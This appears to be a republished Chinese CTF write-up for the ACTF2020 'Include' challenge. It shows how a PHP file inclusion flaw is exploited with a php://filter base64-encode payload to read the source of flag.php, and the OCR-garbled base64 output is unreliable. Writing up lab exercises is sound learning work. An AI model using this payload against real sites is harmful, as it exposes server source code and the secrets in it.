首页 > 其他分享 >[ACTF2020新生赛]Include

[ACTF2020新生赛]Include

时间:2023-06-17 11:11:18浏览次数:36  
标签:ACTF2020 Include 新生 flag file 源代码 php

>

[ACTF2020 新生赛**]Include**

c O a c7ffc310-47d1-4673-9e3c-e53af99bb7ce.node4. buuoj.cn:81 Linux win Ows Can you find out the flag? Q HTML head < / html > D centos DR D Git HackBar

由于是file伪协议打开flag.php文件可能存在文件漏洞

进入发现没有flag

进行猜测flag存在flag.php源代码中

可以利用php://filter伪协议来查看flag.php的源代码,

构造payload:?file=php://filter/convert.base64-encode/resource=flag.php

看到文件

PD9waHAKZWNobyAiQ2FulHlvdSBmaW5klG91dCBOaGUgZmxhZz8iOwovL2ZsYWd7Yzc4M2RkODgtY2E5YSOOYjAwLTkxYWUtZTdmYWMxNTlmMjcOfQo= HackBar q HTML P09waHAKNNobyAiQ2F ulH1vdsgmawSk1Gg1dcgeaGUgZmxhZz8i0wov L2Zsywd7Yzc4m2RkOOgtY2ESvseeyjAuL dmnelxN1 Imm5cafQo- :hov

把字符串拿去base64解码

得到flag

标签:ACTF2020,Include,新生,flag,file,源代码,php
From: https://www.cnblogs.com/GoldfishMemory/p/17487232.html

相关文章

  • 检测到 #include 错误。请更新 includePath问题
    一、#include<iostream>标红首先,你没有编译器了,别捅咕了直接去安装一个MinGW参考:MinGW下载和安装教程(biancheng.net) 二、漫长的安装之后,还是不能用,需要配置,参考:(43条消息)vscode检测到#include错误,请更新includePath之解决方法_检测到include错误,请更新includepath_......
  • 不要在#include中使用".."
    按照GoogleC++风格,不应该在#include中使用点号和双点号。例如:project/scr/base/logging.h应该这样包含:#include"base/logging.h"而不是这样:#include"../../../base/logging.h"这样就可以在包含目录配置中看到项目的依赖。如果允许#include使用“..”,任一文件都可以引用到任意......
  • Cmake之 target_include_directories
    target_include_directories是CMake中用于指定目标(target)的头文件搜索路径的命令。它的语法如下:target_include_directories(target[SYSTEM][BEFORE]<INTERFACE|PUBLIC|PRIVATE>[items1...][<INTERFACE|PUBLIC|PRIVATE>[items2...]...]) 其中,`t......
  • C/C++ include 头文件的语句中,双引号和尖括号的区别
    #include指令有两种使用形式#include<stdio.h>文件名放在尖括号中#include“mystuff.h”文件名放在双引号中 双引号"xxx.h",表示编译器先在用户的工作目录下搜索头文件,如果搜索不到则到系统默认目录下去寻找,所以双引号一般用于包含用户自己编写的头文件。如:#include"stu......
  • pandas读取excel表格内容后重新生成表格时因为序号再次生成,出现:Unnamed: 0
    出现的问题如下图:在读取数据的函数中增加:index_col=0,即可。......
  • [ACTF2020 新生赛]Include 1 做题笔记
     点开tips 打开源代码看看 没发现什么信息,试试构造?file=php://filter/read=convert.base64-encode/resource=flag.php 得到base64,试着解码 得到flag......
  • #include_next定义
    #include_next和#include指令一样,也是包含一个头文件,它们的不同地方是包含的路径不一样。 #include_next的意思就是“包含指定的这个文件所在的路径的后面路径的那个文件”,听起来是不是很坳口,我自己也觉得是这样,但下面举个例子说明就清楚了。例如有个搜索路径链,在#include中,它......
  • 简单control net 使用,建筑风格重新生成
    原图生成海景房方法:启用controlnetAnnotatorresolution(分辨率)可以调小一点预处理器:边缘检测cannymodel:canny-fp16正向提示词: masterpiece,bestquality,building,seaviewroom反向提示词:worstquality,lowquality,normalquality,lowres ......
  • [SWPUCTF 2021 新生赛]pop
    很明显了反序列化pop构造pop链,主要还是死盯反序列化的魔法函数从__destruct()入手,这里echo可以调用到__toString__toString调用functionGetflag()w44m类中两个变量并不是共有属性(关于属性文末有链接)private:是PHP中类的私有成员protected:是PHP中类的保护成员所以我......
  • ffmpeg 下载链接(exe,源码,include,lib,dll,a,so)
    Releasen4.2.9·FFmpeg/FFmpeg(github.com) 源码DownloadFFmpeg 官网exeBtbN/FFmpeg-Builds(github.com) build,可以编译的,可以下载动态库,可以生成编译文件......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99